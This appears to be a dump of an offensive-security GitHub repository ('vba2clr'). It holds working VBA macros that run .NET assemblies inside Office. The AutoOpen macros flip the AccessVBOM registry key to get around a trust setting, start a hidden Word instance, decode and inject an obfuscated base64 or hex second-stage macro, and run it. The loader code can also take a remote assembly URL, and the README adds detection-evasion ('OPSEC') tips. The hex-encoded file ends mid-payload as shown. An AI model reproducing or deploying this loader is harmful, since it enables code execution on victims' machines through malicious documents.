├── ExecuteAssembly.clr.x.vba ├── ExecuteAssembly.clr2.0.vba ├── HelloWorld.exe ├── README.md ├── _AppDomain.idl.not.cs ├── vba2clr.b64.vba └── vba2clr.hex.vba /ExecuteAssembly.clr.x.vba: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | 3 | Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal arg1 As LongPtr, ByVal arg2 As LongPtr, ByVal arg3 As Integer, ByVal arg4 As Integer, ByVal arg5 As Long, ByRef arg6 As Integer, ByRef arg7 As LongPtr, ByRef arg8 As Variant) As Long 4 | 5 | Private Declare PtrSafe Function CLRCreateInstance Lib "mscoree.dll" (ByRef arg1 As Any, ByRef arg2 As Any, ByRef arg3 As IUnknown) As Long 6 | 7 | Private Function DispCallWrapper(ByVal IObj As IUnknown, ByVal vftOffset As Integer, ParamArray args() As Variant) 8 | 9 | Dim out As Variant 10 | Dim ret As Long 11 | Dim prgvt(0 To 2) As Integer 12 | Dim prgpvarg(0 To 2) As LongPtr 13 | Dim index As Long 14 | For index = 0 To 2 15 | prgvt(index) = VarType(args(index)) 16 | prgpvarg(index) = VarPtr(args(index)) 17 | Next index 18 | ret = DispCallFunc(ObjPtr(IObj), vftOffset * Len(prgpvarg(0)), 4, vbLong, 3, prgvt(0), prgpvarg(0), out) 19 | 20 | End Function 21 | 22 | Private Function Init(ByVal CLRVersion As String) As mscoree.CorRuntimeHost 23 | 24 | Dim ret As Long 25 | Dim pMetaHost As IUnknown, pRuntimeInfo As IUnknown, pCorRuntimeHost As IUnknown 26 | 27 | 'CLSID_CLRMetaHost "9280188D-0E8E-4867-B30C-7FA83884E8DE" 28 | Dim GUID_CMH&(0 To 7) 29 | GUID_CMH(0) = &H9280188D: GUID_CMH(1) = &H48670E8E: GUID_CMH(2) = &HA87F0CB3: GUID_CMH(3) = &HDEE88438 30 | 31 | 'CLSID IID_ICLRMetaHost "D332DB9E-B9B3-4125-8207-A14884F53216" 32 | Dim GUID_ICMH&(0 To 7) 33 | GUID_ICMH(0) = &HD332DB9E: GUID_ICMH(1) = &H4125B9B3: GUID_ICMH(2) = &H48A10782: GUID_ICMH(3) = &H1632F584 34 | 35 | ret = CLRCreateInstance(GUID_CMH(0), GUID_ICMH(0), pMetaHost) 36 | 37 | 'CLSID IID_ICLRRuntimeInfo "BD39D1D2-BA2F-486A-89B0-B4B0CB466891" 38 | Dim GUID_ICRI&(0 To 7) 39 | GUID_ICRI(0) = &HBD39D1D2: GUID_ICRI(1) = &H486ABA2F: GUID_ICRI(2) = &HB0B4B089: GUID_ICRI(3) = &H916846CB 40 | 41 | Call DispCallWrapper(pMetaHost, 3, StrPtr(CLRVersion), VarPtr(GUID_ICRI(0)), VarPtr(pRuntimeInfo)) 42 | 43 | 'CLSID_CorRuntimeHost "CB2F6723-AB3A-11D2-9C40-00C04FA30A3E" 44 | Dim GUID_CRH&(0 To 7) 45 | GUID_CRH(0) = &HCB2F6723: GUID_CRH(1) = &H11D2AB3A: GUID_CRH(2) = &HC000409C: GUID_CRH(3) = &H3E0AA34F 46 | 47 | 'CLSID IID_ICorRuntimeHost "CB2F6722-AB3A-11D2-9C40-00C04FA30A3E" 48 | Dim GUID_ICRH&(0 To 7) 49 | GUID_ICRH(0) = &HCB2F6722: GUID_ICRH(1) = &H11D2AB3A: GUID_ICRH(2) = &HC000409C: GUID_ICRH(3) = &H3E0AA34F 50 | 51 | ' ICLRRuntimeInfo::GetInterface(REFCLSID, REFIID, void**) [vftable index = 9] 52 | Call DispCallWrapper(pRuntimeInfo, 9, VarPtr(GUID_CRH(0)), VarPtr(GUID_ICRH(0)), VarPtr(pCorRuntimeHost)) 53 | 54 | Set Init = pCorRuntimeHost 55 | 56 | End Function 57 | 58 | Sub Stg1() 59 | 60 | 'Accepts both CLR 2.0 and CLR 4.0, Supports assemblies built with .NET 2.0 -> .NET 4.x 61 | ThisDocument.VBProject.References.AddFromFile "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.tlb" 62 | ThisDocument.VBProject.References.AddFromFile "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb" 63 | 64 | Call Stg2 65 | 66 | End Sub 67 | 68 | Sub Stg2() 69 | 70 | Dim CLRVersion As String 71 | CLRVersion = "v4.0.30319" 72 | 73 | Dim ICRHost As mscoree.CorRuntimeHost 74 | Dim IDomain As mscorlib.AppDomain 75 | 76 | Set ICRHost = Init(CLRVersion) 77 | Call ICRHost.Start 78 | Call ICRHost.GetDefaultDomain(IDomain) 79 | 80 | Dim path As String 81 | path = "C:\HelloWorld.NET4.x.exe" 82 | 83 | IDomain.ExecuteAssembly_2 (path) 84 | 85 | End Sub 86 | 87 | -------------------------------------------------------------------------------- /ExecuteAssembly.clr2.0.vba: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | 3 | Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long 4 | 5 | Sub Stg1() 6 | 7 | 'This will by default load CLR 2.0 even if you load v4.0.30319 TLBs. Only assemblie built with .NET 3.5 or 2.0 are supported 8 | '.NET 3.5 -> v2.0.50727 9 | '.NET 4.x -> v4.0.30319 10 | ThisDocument.VBProject.References.AddFromFile "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb" 11 | ThisDocument.VBProject.References.AddFromFile "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb" 12 | 13 | Call Stg2 14 | 15 | End Sub 16 | 17 | Sub Stg2() 18 | 19 | Dim url 20 | 'url = "http://127.0.0.1:8180/HelloWorld.exe" 21 | 'url = "https://uploadify.net/995a806bc3998884/HelloWorld.exe?download_token=c6acbc2e638c3b70690b7640499541b131c4580f7b0689de903f39800efd3d9b" 22 | url = "C:\HelloWorld.exe" 23 | 24 | Dim ICRHost As New mscoree.CorRuntimeHost 25 | Dim IDomain As AppDomain 26 | ICRHost.Start 27 | ICRHost.GetDefaultDomain IDomain 28 | 29 | Dim prgvt(0 To 1) As Integer 30 | Dim prgpvarg(0 To 1) As LongPtr 31 | 32 | prgvt(0) = VarType(CVar(url)) 33 | prgpvarg(0) = VarPtr(url) 34 | 35 | Dim out: out = 0 36 | Dim ret As Variant 37 | 38 | prgvt(1) = VarType(CVar(out)) 39 | prgpvarg(1) = VarPtr(out) 40 | 41 | 'C#: AppDomain.ExecuteAssembly(url); 42 | Dim hr As Long 43 | hr = DispCallFunc(ObjPtr(IDomain), 51 * Len(prgpvarg(0)), 4, vbLong, 2, prgvt(0), prgpvarg(0), ret) 44 | 45 | End Sub 46 | -------------------------------------------------------------------------------- /HelloWorld.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/med0x2e/vba2clr/09df403d30a4fd4733131bc8c726b561ed0ec6fe/HelloWorld.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### TLDR: 2 | Just experimenting with different ways to load CLR (.NET) assemblies on VBA locally and remotely by using `AppDomain.ExecuteAssembly` or any other handy method after getting arround `AccessVBOM` (programmatic access to visual basic project is not trusted) from VBA. 3 | 4 | * `vba2clr.*.vba`: 5 | * Sets `AccessVBOM` regkey to 1 6 | * Instantiate a `Word.Application` COM object. (could be `Excel.Application` MS PowerPoint, Access ..etc). 7 | * Add Macro From String (Macro corresponds to b64/hex encoded ExecuteAssembly.vba) 8 | * Run ExecuteAssembly.vba Macro using `wordObj.Application.Run...` 9 | 10 | ### .NET from VBA: 11 | * `ExecuteAssembly.clr.2.0.vba`: Up to .NET 3.5 12 | - Adds the required mscordlib references 13 | - Instantiates the required objects (`IDomain`, `ICRHost`) 14 | - Pack the required `AppDomain.ExecuteAssembly` arguments into two separate arrays (variables, types). 15 | - Use DispCallFunc to call `AppDomain.ExecuteAssembly(Arg1, Arg2)` (VFTable offset 51) where `Arg1` is the ".NET Assembly URL" or "Local Path" and `Arg2` is the return value. 16 | - AppDomain methods VFTable offsets can be checked on the AppDomain IDL _AppDomain.idl, just keep in mind that the AppDomain interface inherits from the IUnknown interface, so functions/methods VTable offsets start from the third offset onwards, this is because interfaces inheriting from IUnknown have the first 3 entries in their vtable set to `QueryInterface`, `AddRef`, `Release` methods. 17 | - WinDbg or IDA can be also used as alternatives for extracting functions/methods VTable offsets. 18 | 19 | * `ExecuteAssembly.clr.x.vba`: supports .NET 2, 3.5 and 4.x 20 | 21 | ### OPSEC Notes: 22 | - Creating a COM object for `Word.Application` (or `Excel.Application` ..etc), will result spawning an additional `WinWord.exe` as a child process of svchost.exe instead of the main `WinWord.exe` process. 23 | - `AccessVBOM` Registry key is modified/restored via COM using `WScript.Shell` , using win32 APIs could be a better alternative. 24 | - Hosting the CLR using win32 APIs on VBA is obviously safer than updating the `AccessVBOM` registry key, will leave this for an other day... 25 | - Other .NET APIs such as `System.CodeDom.Compiler` can be used to compile/execute c# code from VBA, check reference below; 26 | 27 | 28 | ### References: 29 | 30 | * https://github.com/jet2jet/vb2clr 31 | * https://github.com/med0x2e/NET-Assembly-Inject-Remote 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /_AppDomain.idl.not.cs: -------------------------------------------------------------------------------- 1 | interface _AppDomain : IUnknown { 2 | HRESULT _stdcall GetTypeInfoCount([out] unsigned long* pcTInfo); 3 | 4 | HRESULT _stdcall GetTypeInfo( 5 | [in] unsigned long iTInfo, 6 | [in] unsigned long lcid, 7 | [in] long ppTInfo 8 | ); 9 | 10 | HRESULT _stdcall GetIDsOfNames( 11 | [in] GUID* riid, 12 | [in] long rgszNames, 13 | [in] unsigned long cNames, 14 | [in] unsigned long lcid, 15 | [in] long rgDispId 16 | ); 17 | 18 | HRESULT _stdcall Invoke( 19 | [in] unsigned long dispIdMember, 20 | [in] GUID* riid, 21 | [in] unsigned long lcid, 22 | [in] short wFlags, 23 | [in] long pDispParams, 24 | [in] long pVarResult, 25 | [in] long pExcepInfo, 26 | [in] long puArgErr 27 | ); 28 | 29 | [propget,custom(54FC8F55-38DE-4703-9C4E-250351302B1C, 1)] 30 | HRESULT _stdcall ToString([out, retval] BSTR* pRetVal); 31 | 32 | HRESULT _stdcall Equals( 33 | [in] VARIANT other, 34 | [out, retval] VARIANT_BOOL* pRetVal 35 | ); 36 | 37 | HRESULT _stdcall GetHashCode([out, retval] long* pRetVal); 38 | 39 | HRESULT _stdcall GetType([out, retval] _Type** pRetVal); 40 | 41 | HRESULT _stdcall InitializeLifetimeService([out, retval] VARIANT* pRetVal); 42 | 43 | HRESULT _stdcall GetLifetimeService([out, retval] VARIANT* pRetVal); 44 | 45 | [propget] 46 | HRESULT _stdcall Evidence([out, retval] _Evidence** pRetVal); 47 | 48 | HRESULT _stdcall add_DomainUnload([in] _EventHandler* value); 49 | 50 | HRESULT _stdcall remove_DomainUnload([in] _EventHandler* value); 51 | 52 | HRESULT _stdcall add_AssemblyLoad([in] _AssemblyLoadEventHandler* value); 53 | 54 | HRESULT _stdcall remove_AssemblyLoad([in] _AssemblyLoadEventHandler* value); 55 | 56 | HRESULT _stdcall add_ProcessExit([in] _EventHandler* value); 57 | 58 | HRESULT _stdcall remove_ProcessExit([in] _EventHandler* value); 59 | 60 | HRESULT _stdcall add_TypeResolve([in] _ResolveEventHandler* value); 61 | 62 | HRESULT _stdcall remove_TypeResolve([in] _ResolveEventHandler* value); 63 | 64 | HRESULT _stdcall add_ResourceResolve([in] _ResolveEventHandler* value); 65 | 66 | HRESULT _stdcall remove_ResourceResolve([in] _ResolveEventHandler* value); 67 | 68 | HRESULT _stdcall add_AssemblyResolve([in] _ResolveEventHandler* value); 69 | 70 | HRESULT _stdcall remove_AssemblyResolve([in] _ResolveEventHandler* value); 71 | 72 | HRESULT _stdcall add_UnhandledException([in] _UnhandledExceptionEventHandler* value); 73 | 74 | HRESULT _stdcall remove_UnhandledException([in] _UnhandledExceptionEventHandler* value); 75 | 76 | HRESULT _stdcall DefineDynamicAssembly( 77 | [in] _AssemblyName* name, 78 | [in] AssemblyBuilderAccess access, 79 | [out, retval] _AssemblyBuilder** pRetVal 80 | ); 81 | 82 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 83 | HRESULT _stdcall DefineDynamicAssembly_2( 84 | [in] _AssemblyName* name, 85 | [in] AssemblyBuilderAccess access, 86 | [in] BSTR dir, 87 | [out, retval] _AssemblyBuilder** pRetVal 88 | ); 89 | 90 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 91 | HRESULT _stdcall DefineDynamicAssembly_3( 92 | [in] _AssemblyName* name, 93 | [in] AssemblyBuilderAccess access, 94 | [in] _Evidence* Evidence, 95 | [out, retval] _AssemblyBuilder** pRetVal 96 | ); 97 | 98 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 99 | HRESULT _stdcall DefineDynamicAssembly_4( 100 | [in] _AssemblyName* name, 101 | [in] AssemblyBuilderAccess access, 102 | [in] _PermissionSet* requiredPermissions, 103 | [in] _PermissionSet* optionalPermissions, 104 | [in] _PermissionSet* refusedPermissions, 105 | [out, retval] _AssemblyBuilder** pRetVal 106 | ); 107 | 108 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 109 | HRESULT _stdcall DefineDynamicAssembly_5( 110 | [in] _AssemblyName* name, 111 | [in] AssemblyBuilderAccess access, 112 | [in] BSTR dir, 113 | [in] _Evidence* Evidence, 114 | [out, retval] _AssemblyBuilder** pRetVal 115 | ); 116 | 117 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 118 | HRESULT _stdcall DefineDynamicAssembly_6( 119 | [in] _AssemblyName* name, 120 | [in] AssemblyBuilderAccess access, 121 | [in] BSTR dir, 122 | [in] _PermissionSet* requiredPermissions, 123 | [in] _PermissionSet* optionalPermissions, 124 | [in] _PermissionSet* refusedPermissions, 125 | [out, retval] _AssemblyBuilder** pRetVal 126 | ); 127 | 128 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 129 | HRESULT _stdcall DefineDynamicAssembly_7( 130 | [in] _AssemblyName* name, 131 | [in] AssemblyBuilderAccess access, 132 | [in] _Evidence* Evidence, 133 | [in] _PermissionSet* requiredPermissions, 134 | [in] _PermissionSet* optionalPermissions, 135 | [in] _PermissionSet* refusedPermissions, 136 | [out, retval] _AssemblyBuilder** pRetVal 137 | ); 138 | 139 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 140 | HRESULT _stdcall DefineDynamicAssembly_8( 141 | [in] _AssemblyName* name, 142 | [in] AssemblyBuilderAccess access, 143 | [in] BSTR dir, 144 | [in] _Evidence* Evidence, 145 | [in] _PermissionSet* requiredPermissions, 146 | [in] _PermissionSet* optionalPermissions, 147 | [in] _PermissionSet* refusedPermissions, 148 | [out, retval] _AssemblyBuilder** pRetVal 149 | ); 150 | 151 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "DefineDynamicAssembly") 152 | HRESULT _stdcall DefineDynamicAssembly_9( 153 | [in] _AssemblyName* name, 154 | [in] AssemblyBuilderAccess access, 155 | [in] BSTR dir, 156 | [in] _Evidence* Evidence, 157 | [in] _PermissionSet* requiredPermissions, 158 | [in] _PermissionSet* optionalPermissions, 159 | [in] _PermissionSet* refusedPermissions, 160 | [in] VARIANT_BOOL IsSynchronized, 161 | [out, retval] _AssemblyBuilder** pRetVal 162 | ); 163 | 164 | HRESULT _stdcall CreateInstance( 165 | [in] BSTR AssemblyName, 166 | [in] BSTR typeName, 167 | [out, retval] _ObjectHandle** pRetVal 168 | ); 169 | 170 | HRESULT _stdcall CreateInstanceFrom( 171 | [in] BSTR assemblyFile, 172 | [in] BSTR typeName, 173 | [out, retval] _ObjectHandle** pRetVal 174 | ); 175 | 176 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "CreateInstance") 177 | HRESULT _stdcall CreateInstance_2( 178 | [in] BSTR AssemblyName, 179 | [in] BSTR typeName, 180 | [in] SAFEARRAY(VARIANT) activationAttributes, 181 | [out, retval] _ObjectHandle** pRetVal 182 | ); 183 | 184 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "CreateInstanceFrom") 185 | HRESULT _stdcall CreateInstanceFrom_2( 186 | [in] BSTR assemblyFile, 187 | [in] BSTR typeName, 188 | [in] SAFEARRAY(VARIANT) activationAttributes, 189 | [out, retval] _ObjectHandle** pRetVal 190 | ); 191 | 192 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "CreateInstance") 193 | HRESULT _stdcall CreateInstance_3( 194 | [in] BSTR AssemblyName, 195 | [in] BSTR typeName, 196 | [in] VARIANT_BOOL ignoreCase, 197 | [in] BindingFlags bindingAttr, 198 | [in] _Binder* Binder, 199 | [in] SAFEARRAY(VARIANT) args, 200 | [in] _CultureInfo* culture, 201 | [in] SAFEARRAY(VARIANT) activationAttributes, 202 | [in] _Evidence* securityAttributes, 203 | [out, retval] _ObjectHandle** pRetVal 204 | ); 205 | 206 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "CreateInstanceFrom") 207 | HRESULT _stdcall CreateInstanceFrom_3( 208 | [in] BSTR assemblyFile, 209 | [in] BSTR typeName, 210 | [in] VARIANT_BOOL ignoreCase, 211 | [in] BindingFlags bindingAttr, 212 | [in] _Binder* Binder, 213 | [in] SAFEARRAY(VARIANT) args, 214 | [in] _CultureInfo* culture, 215 | [in] SAFEARRAY(VARIANT) activationAttributes, 216 | [in] _Evidence* securityAttributes, 217 | [out, retval] _ObjectHandle** pRetVal 218 | ); 219 | 220 | 221 | HRESULT _stdcall Load( 222 | [in] _AssemblyName* assemblyRef, 223 | [out, retval] _Assembly** pRetVal 224 | ); 225 | 226 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "Load") 227 | HRESULT _stdcall Load_2( 228 | [in] BSTR assemblyString, 229 | [out, retval] _Assembly** pRetVal 230 | ); 231 | 232 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "Load") 233 | HRESULT _stdcall Load_3( 234 | [in] SAFEARRAY(unsigned char) rawAssembly, 235 | [out, retval] _Assembly** pRetVal 236 | ); 237 | 238 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "Load") 239 | HRESULT _stdcall Load_4( 240 | [in] SAFEARRAY(unsigned char) rawAssembly, 241 | [in] SAFEARRAY(unsigned char) rawSymbolStore, 242 | [out, retval] _Assembly** pRetVal 243 | ); 244 | 245 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "Load") 246 | HRESULT _stdcall Load_5( 247 | [in] SAFEARRAY(unsigned char) rawAssembly, 248 | [in] SAFEARRAY(unsigned char) rawSymbolStore, 249 | [in] _Evidence* securityEvidence, 250 | [out, retval] _Assembly** pRetVal 251 | ); 252 | 253 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "Load") 254 | HRESULT _stdcall Load_6( 255 | [in] _AssemblyName* assemblyRef, 256 | [in] _Evidence* assemblySecurity, 257 | [out, retval] _Assembly** pRetVal 258 | ); 259 | 260 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "Load") 261 | HRESULT _stdcall Load_7( 262 | [in] BSTR assemblyString, 263 | [in] _Evidence* assemblySecurity, 264 | [out, retval] _Assembly** pRetVal 265 | ); 266 | 267 | HRESULT _stdcall ExecuteAssembly( 268 | [in] BSTR assemblyFile, 269 | [in] _Evidence* assemblySecurity, 270 | [out, retval] long* pRetVal 271 | ); 272 | 273 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "ExecuteAssembly") 274 | HRESULT _stdcall ExecuteAssembly_2( 275 | [in] BSTR assemblyFile, 276 | [out, retval] long* pRetVal 277 | ); 278 | 279 | custom(0F21F359-AB84-41E8-9A78-36D110E6D2F9, "ExecuteAssembly") 280 | HRESULT _stdcall ExecuteAssembly_3( 281 | [in] BSTR assemblyFile, 282 | [in] _Evidence* assemblySecurity, 283 | [in] SAFEARRAY(BSTR) args, 284 | [out, retval] long* pRetVal 285 | ); 286 | 287 | [propget] 288 | HRESULT _stdcall FriendlyName([out, retval] BSTR* pRetVal); 289 | 290 | [propget] 291 | HRESULT _stdcall BaseDirectory([out, retval] BSTR* pRetVal); 292 | 293 | [propget] 294 | HRESULT _stdcall RelativeSearchPath([out, retval] BSTR* pRetVal); 295 | 296 | [propget] 297 | HRESULT _stdcall ShadowCopyFiles([out, retval] VARIANT_BOOL* pRetVal); 298 | 299 | HRESULT _stdcall GetAssemblies([out, retval] SAFEARRAY(_Assembly*)* pRetVal); 300 | 301 | HRESULT _stdcall AppendPrivatePath([in] BSTR Path); 302 | 303 | HRESULT _stdcall ClearPrivatePath(); 304 | 305 | HRESULT _stdcall SetShadowCopyPath([in] BSTR s); 306 | 307 | HRESULT _stdcall ClearShadowCopyPath(); 308 | 309 | HRESULT _stdcall SetCachePath([in] BSTR s); 310 | 311 | HRESULT _stdcall SetData( 312 | [in] BSTR name, 313 | [in] VARIANT data 314 | ); 315 | 316 | HRESULT _stdcall GetData( 317 | [in] BSTR name, 318 | [out, retval] VARIANT* pRetVal 319 | ); 320 | 321 | HRESULT _stdcall SetAppDomainPolicy([in] _PolicyLevel* domainPolicy); 322 | 323 | HRESULT _stdcall SetThreadPrincipal([in] IPrincipal* principal); 324 | 325 | HRESULT _stdcall SetPrincipalPolicy([in] PrincipalPolicy policy); 326 | 327 | HRESULT _stdcall DoCallBack([in] _CrossAppDomainDelegate* theDelegate); 328 | 329 | [propget] 330 | HRESULT _stdcall DynamicDirectory([out, retval] BSTR* pRetVal); 331 | }; 332 | -------------------------------------------------------------------------------- /vba2clr.b64.vba: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | 3 | Function DecodeBase64(b64$) 4 | Dim b 5 | With CreateObject("Microsoft.XMLDOM").createElement("b64") 6 | .DataType = "bin.base64": .Text = b64 7 | b = .nodeTypedValue 8 | With CreateObject("ADODB.Stream") 9 | .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8" 10 | DecodeBase64 = .ReadText 11 | .Close 12 | End With 13 | End With 14 | End Function 15 | 16 | Private Sub SetRegKey(val As Integer) 17 | Dim wsh As Object 18 | Dim registryKey As String 19 | Set wsh = CreateObject("WScript.Shell") 20 | registryKey = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\AccessVBOM" 21 | wsh.RegWrite registryKey, val, "REG_DWORD" 22 | End Sub 23 | 24 | Sub AutoOpen() 25 | 26 | SetRegKey (1) 27 | 28 | Dim wordObj As Word.Application 29 | Set wordObj = CreateObject("Word.Application") 30 | 31 | Dim ModuleObj As Object 32 | Set ModuleObj = wordObj.Documents.Add().VBProject.VBComponents.Add(1) 33 | ModuleObj.Name = "TestModule" 34 | 35 | 'ExecuteAssembly.vba base64 encoded 36 | Dim stg1 As String 37 | stg1 = "T3B0aW9uIEV4cGxpY2l0DQoNClByaXZhdGUgRGVjbGFyZSBQdHJTYWZlIEZ1bmN0aW9uIERpc3BDYWxs" 38 | stg1 = stg1 & "RnVuYyBMaWIgIm9sZWF1dDMyLmRsbCIgKEJ5VmFsIHB2IEFzIExvbmdQdHIsIEJ5VmFsIG92IEFzIExv" 39 | stg1 = stg1 & "bmdQdHIsIEJ5VmFsIGNjIEFzIEludGVnZXIsIEJ5VmFsIHZyIEFzIEludGVnZXIsIEJ5VmFsIGNhIEFz" 40 | stg1 = stg1 & "IExvbmcsIEJ5UmVmIHByIEFzIEludGVnZXIsIEJ5UmVmIHBnIEFzIExvbmdQdHIsIEJ5UmVmIHBhciBB" 41 | stg1 = stg1 & "cyBWYXJpYW50KSBBcyBMb25nDQoNClN1YiBTdGcxKCkNCg0KICAgIFRoaXNEb2N1bWVudC5WQlByb2pl" 42 | stg1 = stg1 & "Y3QuUmVmZXJlbmNlcy5BZGRGcm9tRmlsZSAiQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29y" 43 | stg1 = stg1 & "a1x2Mi4wLjUwNzI3XG1zY29yZWUudGxiIg0KICAgIFRoaXNEb2N1bWVudC5WQlByb2plY3QuUmVmZXJl" 44 | stg1 = stg1 & "bmNlcy5BZGRGcm9tRmlsZSAiQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUw" 45 | stg1 = stg1 & "NzI3XG1zY29ybGliLnRsYiINCiAgICANCiAgICBDYWxsIFN0ZzINCg0KRW5kIFN1Yg0KDQpTdWIgU3Rn" 46 | stg1 = stg1 & "MigpDQoNCiAgICBEaW0gdXJsDQoJdXJsID0gIkM6XEhlbGxvV29ybGQuZXhlIg0KICAgIA0KDQogICAg" 47 | stg1 = stg1 & "RGltIElDUkhvc3QgQXMgTmV3IG1zY29yZWUuQ29yUnVudGltZUhvc3QNCiAgICBEaW0gSURvbWFpbiBB" 48 | stg1 = stg1 & "cyBBcHBEb21haW4NCiAgICBJQ1JIb3N0LlN0YXJ0DQogICAgSUNSSG9zdC5HZXREZWZhdWx0RG9tYWlu" 49 | stg1 = stg1 & "IElEb21haW4NCiANCiAgICBEaW0gcHJndnQoMCBUbyAxKSBBcyBJbnRlZ2VyDQogICAgRGltIHByZ3B2" 50 | stg1 = stg1 & "YXJnKDAgVG8gMSkgQXMgTG9uZ1B0cg0KICAgIA0KICAgIHByZ3Z0KDApID0gVmFyVHlwZShDVmFyKHVy" 51 | stg1 = stg1 & "bCkpDQogICAgcHJncHZhcmcoMCkgPSBWYXJQdHIodXJsKQ0KDQogICAgRGltIG91dDogb3V0ID0gMA0K" 52 | stg1 = stg1 & "ICAgIERpbSByZXQgQXMgVmFyaWFudA0KICAgIA0KICAgIHByZ3Z0KDEpID0gVmFyVHlwZShDVmFyKG91" 53 | stg1 = stg1 & "dCkpDQogICAgcHJncHZhcmcoMSkgPSBWYXJQdHIob3V0KQ0KICAgIA0KICAgIA0KICAgICdDYWxscyBB" 54 | stg1 = stg1 & "cHBEb21haW4uRXhlY3V0ZUFzc2VtYmx5KEFTU0VNQkxZX1VSTCwgRXZpZGVuY2UgT0JKRUNUKQ0KICAg" 55 | stg1 = stg1 & "IERpbSBociBBcyBMb25nDQogICAgaHIgPSBEaXNwQ2FsbEZ1bmMoT2JqUHRyKElEb21haW4pLCA1MSAq" 56 | stg1 = stg1 & "IExlbihwcmdwdmFyZygwKSksIDQsIHZiTG9uZywgMiwgcHJndnQoMCksIHByZ3B2YXJnKDApLCByZXQp" 57 | stg1 = stg1 & "DQogICAgDQpFbmQgU3ViDQoNCg0K" 58 | 59 | Dim stg1dec As String 60 | stg1dec = DecodeBase64(stg1) 61 | 62 | wordObj.Visible = False 63 | wordObj.DisplayAlerts = False 64 | ModuleObj.codeModule.AddFromString (stg1dec) 65 | wordObj.Application.Run ("TestModule.Stg1") 66 | wordObj.ActiveDocument.Close (False) 67 | 'wordObj.Documents(1).Close (False) 68 | 69 | SetRegKey (0) 70 | 71 | 72 | End Sub 73 | -------------------------------------------------------------------------------- /vba2clr.hex.vba: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | 3 | Function HexDecode(hex$) 4 | Dim b 5 | With CreateObject("Microsoft.XMLDOM").createElement("hex") 6 | .DataType = "bin.hex": .Text = hex 7 | b = .nodeTypedValue 8 | With CreateObject("ADODB.Stream") 9 | .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8" 10 | HexDecode = .ReadText 11 | .Close 12 | End With 13 | End With 14 | End Function 15 | 16 | Private Sub SetRegKey(val As Integer) 17 | Dim wsh As Object 18 | Dim registryKey As String 19 | Set wsh = CreateObject("WScript.Shell") 20 | registryKey = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\AccessVBOM" 21 | wsh.RegWrite registryKey, val, "REG_DWORD" 22 | End Sub 23 | 24 | 25 | Sub AutoOpen() 26 | SetRegKey (1) 27 | 28 | Dim wordObj As Word.Application 29 | Set wordObj = CreateObject("Word.Application") 30 | 31 | Dim ModuleObj As Object 32 | Set ModuleObj = wordObj.Documents.Add().VBProject.VBComponents.Add(1) 33 | ModuleObj.Name = "TestModule" 34 | 35 | 'ExecuteAssembly.vba hex encoded; certutil.exe -encodehex ExecuteAssembly.vba encoded.txt 36 | Dim stg1 As String 37 | stg1 = "4f7074696f6e204578706c696369740d0a0d0a50726976617465204465636c61726520507472536166" 38 | stg1 = stg1 & "652046756e6374696f6e204469737043616c6c46756e63204c696220226f6c6561757433322e646c" 39 | stg1 = stg1 & "6c222028427956616c207076204173204c6f6e675074722c20427956616c206f76204173204c6f6e" 40 | stg1 = stg1 & "675074722c20427956616c20636320417320496e74656765722c20427956616c2076722041732049" 41 | stg1 = stg1 & "6e74656765722c20427956616c206361204173204c6f6e672c20427952656620707220417320496e" 42 | stg1 = stg1 & "74656765722c204279526566207067204173204c6f6e675074722c20427952656620706172204173" 43 | stg1 = stg1 & "2056617269616e7429204173204c6f6e670d0a0d0a537562205374673128290d0a0d0a2020202054" 44 | stg1 = stg1 & "686973446f63756d656e742e564250726f6a6563742e5265666572656e6365732e41646446726f6d" 45 | stg1 = stg1 & "46696c652022433a5c57696e646f77735c4d6963726f736f66742e4e45545c4672616d65776f726b" 46 | stg1 = stg1 & "5c76322e302e35303732375c6d73636f7265652e746c62220d0a2020202054686973446f63756d65" 47 | stg1 = stg1 & "6e742e564250726f6a6563742e5265666572656e6365732e41646446726f6d46696c652022433a5c" 48 | stg1 = stg1 & 